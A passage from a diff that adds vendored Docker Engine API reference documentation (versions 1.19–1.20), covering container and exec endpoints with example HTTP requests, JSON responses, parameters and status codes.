– no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. + +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. +- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.19/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.19/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. + +**Example request**: + + GET /v1.19/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: plain/text + + { + "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39", + "Running" : false, + "ExitCode" : 2, + "ProcessConfig" : { + "privileged" : false, + "user" : "", + "tty" : false, + "entrypoint" : "sh", + "arguments" : [ + "-c", + "exit 2" + ] + }, + "OpenStdin" : false, + "OpenStderr" : false, + "OpenStdout" : false, + "Container" : { + "State" : { + "Running" : true, + "Paused" : false, + "Restarting" : false, + "OOMKilled" : false, + "Pid" : 3650, + "ExitCode" : 0, + "Error" : "", + "StartedAt" : "2014-11-17T22:26:03.717657531Z", + "FinishedAt" : "0001-01-01T00:00:00Z" + }, + "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c", + "Created" : "2014-11-17T22:26:03.626304998Z", + "Path" : "date", + "Args" : [], + "Config" : { + "Hostname" : "8f177a186b97", + "Domainname" : "", + "User" : "", + "AttachStdin" : false, + "AttachStdout" : false, + "AttachStderr" : false, + "PortSpecs": null, + "ExposedPorts" : null, + "Tty" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ], + "Cmd" : [ + "date" + ], + "Image" : "ubuntu", + "Volumes" : null, + "WorkingDir" : "", + "Entrypoint" : null, + "NetworkDisabled" : false, + "MacAddress" : "", + "OnBuild" : null, + "SecurityOpt" : null + }, + "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5", + "NetworkSettings" : { + "IPAddress" : "172.17.0.2", + "IPPrefixLen" : 16, + "MacAddress" : "02:42:ac:11:00:02", + "Gateway" : "172.17.42.1", + "Bridge" : "docker0", + "PortMapping" : null, + "Ports" : {} + }, + "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf", + "HostnamePath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname", + "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Name" : "/test", + "Driver" : "aufs", + "ExecDriver" : "native-0.2", + "MountLabel" : "", + "ProcessLabel" : "", + "AppArmorProfile" : "", + "RestartCount" : 0, + "Volumes" : {}, + "VolumesRW" : {} + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all, +default or blank means CORS disabled + + $ docker -d -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.20.md b/vendor/github.com/docker/docker/docs/api/v1.20.md new file mode 100644 index 0000000000..2532c49950 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.20.md @@ -0,0 +1,2391 @@ +--- +title: "Engine API v1.20" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.20/ +- /reference/api/docker_remote_api_v1.20/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. + +## 2. Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.20/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "Command": "echo 1", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "Command": "echo 222222", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0 + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`created`|`restarting`|`running`|`paused`|`exited`) + - `label=key` or `label="key=value"` of a container label + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.20/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "MemorySwappiness": 60, + "OomKillDisable": false, + "PidMode": "", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "GroupAdd": ["newgroup"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **HostConfig** + - **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **LxcConf** - LXC specific configurations. These configurations only + work when using the `lxc` execution driver. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. + - **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **GroupAdd** - A list of additional groups that the container process will run as + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **NetworkMode** - Sets the networking mode for the container. Supported + values are: `bridge`, `host`, `none`, and `container:` + - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `gelf`, `none`. + `json-file` logging driver. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": null, + "WorkingDir": "" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecDriver": "native-0.2", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "BlkioWeight": 0, + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "OomKillDisable": false, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}] + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "Gateway": "", + "IPAddress": "", + "IPPrefixLen": 0, + "MacAddress": "", + "PortMapping": null, + "Ports": null + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z" + }, + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ] + } + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. + +**Example request**: + + GET /v1.20/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "network" : { + "rx_dropped" : 0, + "rx_bytes" : 648, + "rx_errors" : 0, + "tx_packets" : 8, + "tx_dropped" : 0, + "rx_packets" : 8, + "tx_errors" : 0, + "tx_bytes" : 648 + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 9492140000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize?h=&w=` + +Resize the TTY for container with `id`. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.20/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. + +**Example request**: + + POST /v1.20/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.20/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.20/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, 